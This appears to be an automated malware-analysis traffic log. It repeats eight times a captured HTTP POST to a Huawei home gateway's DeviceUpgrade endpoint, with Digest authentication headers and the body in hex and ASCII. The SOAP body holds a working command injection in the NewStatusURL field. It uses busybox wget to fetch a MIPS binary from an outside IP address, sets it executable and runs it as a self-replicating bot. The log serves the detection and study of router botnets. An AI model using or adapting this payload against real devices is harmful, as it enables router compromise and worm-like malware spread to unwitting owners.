Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 39 2e 31 32 2e 32 33 33 2e 35 32 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 35 39 36 61 39 36 63 63 37 62 66 39 31 30 38 63 64 38 39 36 66 33 33 63 34 34 61 65 64 63 38 61 2f 64 62 30 66 61 34 62 38 64 62 30 33 33 33 33 36 37 65 39 62 64 61 33 61 62 36 38 62 38 30 34 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 49.12.233.52 -l /tmp/.hiroshima -r /596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 39 2e 31 32 2e 32 33 33 2e 35 32 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 35 39 36 61 39 36 63 63 37 62 66 39 31 30 38 63 64 38 39 36 66 33 33 63 34 34 61 65 64 63 38 61 2f 64 62 30 66 61 34 62 38 64 62 30 33 33 33 33 36 37 65 39 62 64 61 33 61 62 36 38 62 38 30 34 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 49.12.233.52 -l /tmp/.hiroshima -r /596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 39 2e 31 32 2e 32 33 33 2e 35 32 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 35 39 36 61 39 36 63 63 37 62 66 39 31 30 38 63 64 38 39 36 66 33 33 63 34 34 61 65 64 63 38 61 2f 64 62 30 66 61 34 62 38 64 62 30 33 33 33 33 36 37 65 39 62 64 61 33 61 62 36 38 62 38 30 34 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 49.12.233.52 -l /tmp/.hiroshima -r /596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 39 2e 31 32 2e 32 33 33 2e 35 32 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 35 39 36 61 39 36 63 63 37 62 66 39 31 30 38 63 64 38 39 36 66 33 33 63 34 34 61 65 64 63 38 61 2f 64 62 30 66 61 34 62 38 64 62 30 33 33 33 33 36 37 65 39 62 64 61 33 61 62 36 38 62 38 30 34 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 49.12.233.52 -l /tmp/.hiroshima -r /596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 39 2e 31 32 2e 32 33 33 2e 35 32 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 35 39 36 61 39 36 63 63 37 62 66 39 31 30 38 63 64 38 39 36 66 33 33 63 34 34 61 65 64 63 38 61 2f 64 62 30 66 61 34 62 38 64 62 30 33 33 33 33 36 37 65 39 62 64 61 33 61 62 36 38 62 38 30 34 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 49.12.233.52 -l /tmp/.hiroshima -r /596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 39 2e 31 32 2e 32 33 33 2e 35 32 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 35 39 36 61 39 36 63 63 37 62 66 39 31 30 38 63 64 38 39 36 66 33 33 63 34 34 61 65 64 63 38 61 2f 64 62 30 66 61 34 62 38 64 62 30 33 33 33 33 36 37 65 39 62 64 61 33 61 62 36 38 62 38 30 34 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 49.12.233.52 -l /tmp/.hiroshima -r /596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 39 2e 31 32 2e 32 33 33 2e 35 32 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 35 39 36 61 39 36 63 63 37 62 66 39 31 30 38 63 64 38 39 36 66 33 33 63 34 34 61 65 64 63 38 61 2f 64 62 30 66 61 34 62 38 64 62 30 33 33 33 33 36 37 65 39 62 64 61 33 61 62 36 38 62 38 30 34 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 49.12.233.52 -l /tmp/.hiroshima -r /596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 39 2e 31 32 2e 32 33 33 2e 35 32 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 35 39 36 61 39 36 63 63 37 62 66 39 31 30 38 63 64 38 39 36 66 33 33 63 34 34 61 65 64 63 38 61 2f 64 62 30 66 61 34 62 38 64 62 30 33 33 33 33 36 37 65 39 62 64 61 33 61 62 36 38 62 38 30 34 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 49.12.233.52 -l /tmp/.hiroshima -r /596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
